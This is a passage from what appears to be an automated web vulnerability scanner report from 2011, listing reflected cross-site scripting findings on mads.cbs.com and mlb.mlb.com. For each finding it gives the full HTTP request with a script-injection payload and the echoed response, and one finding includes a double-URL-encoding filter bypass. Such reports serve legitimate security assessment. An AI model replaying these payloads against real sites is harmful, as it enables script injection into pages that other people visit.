This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1&5daa3<a>6676c279d3d=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:05:49 GMT
Server: Apache/2.2
Content-Length: 493
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:05:49 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1&5daa3<a>6676c279d3d=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) *//* MAC [r20110907-1630-TRUNKPOSTMERGE:1.13.14] phx1-ad-xw11.cnet.com::1772648
...[SNIP]...

2.107. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload c2d42*/alert(1)//dca1b90ae75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1&c2d42*/alert(1)//dca1b90ae75=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:03:51 GMT
Server: Apache/2.2
Content-Length: 1094
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:03:51 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1&c2d42*/alert(1)//dca1b90ae75=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

2.108. http://mads.cbs.com/mac-ad [x-cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the x-cb request parameter is copied into the HTML document as plain text between tags. The payload bef97<a>6d51ff261c3 was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046bef97<a>6d51ff261c3&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:04:21 GMT
Server: Apache/2.2
Content-Length: 489
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:04:21 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046bef97<a>6d51ff261c3&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) *//* MAC [r20110907-1630-TRUNKPOSTMERGE:1.13.14] phx1-
...[SNIP]...

2.109. http://mads.cbs.com/mac-ad [x-cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the x-cb request parameter is copied into a JavaScript inline comment. The payload 8242a*/alert(1)//a2b812f71ef was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=783252448242a*/alert(1)//a2b812f71ef&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:02:37 GMT
Server: Apache/2.2
Content-Length: 1091
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:02:37 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=783252448242a*/alert(1)//a2b812f71ef&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

2.110. http://mlb.mlb.com/account/quick_login_hdr.jsp [successRedirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /account/quick_login_hdr.jsp

Issue detail

The value of the successRedirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52427%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb13060bc01f was submitted in the successRedirect parameter. This input was echoed as 52427"><script>alert(1)</script>b13060bc01f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the successRedirect request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /account/quick_login_hdr.jsp?successRedirect=http://mlb.mlb.com/shared/account/v2/login_success.jsp%3Fcallback%3Dl131759879149452427%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb13060bc01f&callback=l1317598791494&stylesheet=/style/account_management/myAccountMini.css&submitImage=/shared/components/gameday/v4/images/btn-login.gif&errorRedirect=http://mlb.mlb.com/account/quick_login_hdr.jsp%3Ferror%3Dtrue%26successRedirect%3Dhttp%253A%252F%252Fmlb.mlb.com%252Fshared%252Faccount%252Fv2%252Flogin_success.jsp%25253Fcallback%25253Dl1317598791494%26callback%3Dl1317598791494%26stylesheet%3D%252Fstyle%252Faccount_management%252FmyAccountMini.css%26submitImage%3D%252Fshared%252Fcomponents%252Fgameday%252Fv4%252Fimages%252Fbtn-login.gif%26errorRedirect%3Dhttp%3A//mlb.mlb.com/account/quick_login_hdr.jsp%253Ferror%253Dtrue%2526successRedirect%253Dhttp%25253A%25252F%25252Fmlb.mlb.com%25252Fshared%25252Faccount%25252Fv2%25252Flogin_success.jsp%2525253Fcallback%2525253Dl1317598791494%2526callback%253Dl1317598791494%2526stylesheet%253D%25252Fstyle%25252Faccount_management%25252FmyAccountMini.css%2526submitImage%253D%25252Fshared%25252Fcomponents%25252Fgameday%25252Fv4%25252Fimages%25252Fbtn-login.gif HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://mlb.mlb.com/mlb/schedule/?tcid=mm_mlb_schedule
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: homeObj.drawer.disable=true; stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=mlbglobal08%2Cmlbcom08%3D%2526pid%253DMajor%252520League%252520Baseball%25253A%252520Schedule%25253A%252520Schedule%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmlb.mlb.com%25252Fmlb%25252Fschedule%25252F_tcid%25253Dmm_mlb_schedule%252523%25252Fenterworkflow.do%25253FflowId%25253Dregistration.ajax._1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6219
Cache-Control: max-age=7151
Expires: Mon, 03 Oct 2011 01:39:10 GMT
Date: Sun, 02 Oct 2011 23:39:59 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>Login</title>
   <meta http-equi
...[SNIP]...
<input type="hidden" name="successRedirect" value="http://mlb.mlb.com/shared/account/v2/login_success.jsp?callback=l131759879149452427"><script>alert(1)</script>b13060bc01f" />
...[SNIP]...

2.111. http://mlb.mlb.com/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12fe8"><script>alert(1)</script>fe0afe25a1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.jsp?12fe8"><script>alert(1)</script>fe0afe25a1a=1 HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text/html;charset=utf-8
Content-Length: 114095
Cache-Control: max-age=600
Expires: Sun, 02 Oct 2011 23:00:45 GMT
Date: Sun, 02 Oct 2011 22:50:45 GMT
Connection: close
Vary: Accept-Encoding


                                                                   
...[SNIP]...
<link rel="canonical" href="http://mlb.mlb.com/index.jsp?12fe8"><script>alert(1)</script>fe0afe25a1a=1" />
...[SNIP]...

2.112. http://mlb.mlb.com/lookup/json/named.leader_hitting_repeater.bam [game_type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/json/named.leader_hitting_repeater.bam

Issue detail

The value of the game_type request parameter is copied into the HTML document as plain text between tags. The payload 653da<script>alert(1)</script>bdf1290c6d2 was submitted in the game_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lookup/json/named.leader_hitting_repeater.bam?results=5&season=2011&game_type=653da<script>alert(1)</script>bdf1290c6d2&leader_hitting_repeater.col_in=avg&leader_hitting_repeater.col_in=r&leader_hitting_repeater.col_in=hr&leader_hitting_repeater.col_in=rbi&leader_hitting_repeater.col_in=sb&leader_hitting_repeater.col_in=name_last&leader_hitting_repeater.col_in=team_abbrev&leader_hitting_repeater.col_in=player_id&sort_column='avg'&sort_column='r'&sort_column='hr'&sort_column='rbi'&sort_column='sb'&sport_code='mlb' HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://mlb.mlb.com/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 500 Internal Server Error
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 145
Cneonction: close
X-N: S
Date: Sun, 02 Oct 2011 22:51:40 GMT
Connection: close

com.bamnetworks.lookup.servlet.LookupException: game_type must be a valid integer value and you passed: 653da<script>alert(1)</script>bdf1290c6d2

2.113. http://mlb.mlb.com/lookup/json/named.leader_hitting_repeater.bam [results parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/json/named.leader_hitting_repeater.bam

Issue detail

The value of the results request parameter is copied into the HTML document as plain text between tags. The payload 50aa1<script>alert(1)</script>9d81154f3fc was submitted in the results parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lookup/json/named.leader_hitting_repeater.bam?results=550aa1<script>alert(1)</script>9d81154f3fc&season=2011&game_type='R'&leader_hitting_repeater.col_in=avg&leader_hitting_repeater.col_in=r&leader_hitting_repeater.col_in=hr&leader_hitting_repeater.col_in=rbi&leader_hitting_repeater.col_in=sb&leader_hitting_repeater.col_in=name_last&leader_hitting_repeater.col_in=team_abbrev&leader_hitting_repeater.col_in=player_id&sort_column='avg'&sort_column='r'&sort_column='hr'&sort_column='rbi'&sort_column='sb'&sport_code='mlb' HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://mlb.mlb.com/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 500 Internal Server Error
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 145
Cneonction: close
X-N: S
Date: Sun, 02 Oct 2011 22:51:31 GMT
Connection: close

com.bamnetworks.lookup.servlet.LookupException: results must be a valid integer value and you passed: 550aa1<script>alert(1)</script>9d81154f3fc

2.114. http://mlb.mlb.com/lookup/json/named.leader_hitting_repeater.bam [season parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/json/named.leader_hitting_repeater.bam

Issue detail

The value of the season request parameter is copied into the HTML document as plain text between tags. The payload 49e07<script>alert(1)</script>7a3efe3920b was submitted in the season parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lookup/json/named.leader_hitting_repeater.bam?results=5&season=201149e07<script>alert(1)</script>7a3efe3920b&game_type='R'&leader_hitting_repeater.col_in=avg&leader_hitting_repeater.col_in=r&leader_hitting_repeater.col_in=hr&leader_hitting_repeater.col_in=rbi&leader_hitting_repeater.col_in=sb&leader_hitting_repeater.col_in=name_last&leader_hitting_repeater.col_in=team_abbrev&leader_hitting_repeater.col_in=player_id&sort_column='avg'&sort_column='r'&sort_column='hr'&sort_column='rbi'&sort_column='sb'&sport_code='mlb' HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://mlb.mlb.com/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 500 Internal Server Error
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 147
Cneonction: close
X-N: S
Date: Sun, 02 Oct 2011 22:51:36 GMT
Connection: close

com.bamnetworks.lookup.servlet.LookupException: season must be a valid integer value and you passed: 201149e07<script>alert(1)</script>7a3efe3920b

2.115. http://mlb.mlb.com/lookup/json/named.leader_pitching_repeater.bam [game_type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/json/named.leader_pitching_repeater.bam

Issue detail

The value of the game_type request parameter is copied into the HTML document as plain text between tags. The payload a0bc8<script>alert(1)</script>fb219e84209 was submitted in the game_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lookup/json/named.leader_pitching_repeater.bam?results=5&season=2011&game_type=a0bc8<script>alert(1)</script>fb219e84209&leader_pitching_repeater.col_in=w&leader_pitching_repeater.col_in=sv&leader_pitching_repeater.col_in=so&leader_pitching_repeater.col_in=era&leader_pitching_repeater.col_in=whip&leader_pitching_repeater.col_in=name_last&leader_pitching_repeater.col_in=team_abbrev&leader_pitching_repeater.col_in=player_id&sort_column='w'&sort_column='sv'&sort_column='so'&sort_column='era'&sort_column='whip'&sport_code='mlb' HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://mlb.mlb.com/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 500 Internal Server Error
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 145
Cneonction: close
X-N: S
Date: Sun, 02 Oct 2011 22:51:39 GMT
Connection: close

com.bamnetworks.lookup.servlet.LookupException: game_type must be a valid integer value and you passed: a0bc8<script>alert(1)</script>fb219e84209

2.116. http://mlb.mlb.com/lookup/json/named.leader_pitching_repeater.bam [results parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/json/named.leader_pitching_repeater.bam

Issue detail

The value of the results request parameter is copied into the HTML document as plain text between tags. The payload 45ef3<script>alert(1)</script>ebf1e9ad065 was submitted in the results parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lookup/json/named.leader_pitching_repeater.bam?results=545ef3<script>alert(1)</script>ebf1e9ad065&season=2011&game_type='R'&leader_pitching_repeater.col_in=w&leader_pitching_repeater.col_in=sv&leader_pitching_repeater.col_in=so&leader_pitching_repeater.col_in=era&leader_pitching_repeater.col_in=whip&leader_pitching_repeater.col_in=name_last&leader_pitching_repeater.col_in=team_abbrev&leader_pitching_repeater.col_in=player_id&sort_column='w'&sort_column='sv'&sort_column='so'&sort_column='era'&sort_column='whip'&sport_code='mlb' HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://mlb.mlb.com/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 500 Internal Server Error
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 145
Cneonction: close
X-N: S
Date: Sun, 02 Oct 2011 22:51:30 GMT
Connection: close

com.bamnetworks.lookup.servlet.LookupException: results must be a valid integer value and you passed: 545ef3<script>alert(1)</script>ebf1e9ad065

2.117. http://mlb.mlb.com/lookup/json/named.leader_pitching_repeater.bam [season parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/json/named.leader_pitching_repeater.bam

Issue detail

The value of the season request parameter is copied into the HTML document as plain text between tags. The payload 3edc5<script>alert(1)</script>7a5d2535dc9 was submitted in the season parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lookup/json/named.leader_pitching_repeater.bam?results=5&season=20113edc5<script>alert(1)</script>7a5d2535dc9&game_type='R'&leader_pitching_repeater.col_in=w&leader_pitching_repeater.col_in=sv&leader_pitching_repeater.col_in=so&leader_pitching_repeater.col_in=era&leader_pitching_repeater.col_in=whip&leader_pitching_repeater.col_in=name_last&leader_pitching_repeater.col_in=team_abbrev&leader_pitching_repeater.col_in=player_id&sort_column='w'&sort_column='sv'&sort_column='so'&sort_column='era'&sort_column='whip'&sport_code='mlb' HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://mlb.mlb.com/index.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 500 Internal Server Error
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 147
Cneonction: close
X-N: S
Date: Sun, 02 Oct 2011 22:51:35 GMT
Connection: close

com.bamnetworks.lookup.servlet.LookupException: season must be a valid integer value and you passed: 20113edc5<script>alert(1)</script>7a5d2535dc9

2.118. http://mlb.mlb.com/lookup/json/named.org_game_type_date_info.bam [game_type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/json/named.org_game_type_date_info.bam

Issue detail

The value of the game_type request parameter is copied into the HTML document as plain text between tags. The payload 84a61<script>alert(1)</script>3a229642abe was submitted in the game_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lookup/json/named.org_game_type_date_info.bam?sport_code='mlb'&current_sw='Y'&game_type=84a61<script>alert(1)</script>3a229642abe&game_type='R'&game_type='A'&game_type='D'&game_type='L'&game_type='W'&season=2011 HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://mlb.mlb.com/stats/sortable.jsp?c_id=mlb&tcid=mm_mlb_stats
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: homeObj.drawer.disable=true; stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 97
Cache-Control: max-age=300
Date: Sun, 02 Oct 2011 22:55:49 GMT
Connection: close

game_type must be a valid integer value and you passed: 84a61<script>alert(1)</script>3a229642abe

2.119. http://mlb.mlb.com/lookup/json/named.org_game_type_date_info.bam [season parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /lookup/json/named.org_game_type_date_info.bam

Issue detail

The value of the season request parameter is copied into the HTML document as plain text between tags. The payload 391a1<script>alert(1)</script>747ddddc175 was submitted in the season parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lookup/json/named.org_game_type_date_info.bam?sport_code='mlb'&current_sw='Y'&game_type='S'&game_type='R'&game_type='A'&game_type='D'&game_type='L'&game_type='W'&season=2011391a1<script>alert(1)</script>747ddddc175 HTTP/1.1
Host: mlb.mlb.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://mlb.mlb.com/stats/sortable.jsp?c_id=mlb&tcid=mm_mlb_stats
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: homeObj.drawer.disable=true; stUtil_cookie=1%7C%7C4346219321317595822344; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Content-Type: text;charset=ISO-8859-1
Content-Length: 99
Cache-Control: max-age=283
Date: Sun, 02 Oct 2011 22:56:01 GMT
Connection: close

season must be a valid integer value and you passed: 2011391a1<script>alert(1)</script>747ddddc175

2.120. http://mlb.mlb.com/lookup/json/named.org_game_type_date_info.bam [sport_code parameter]  previous  next

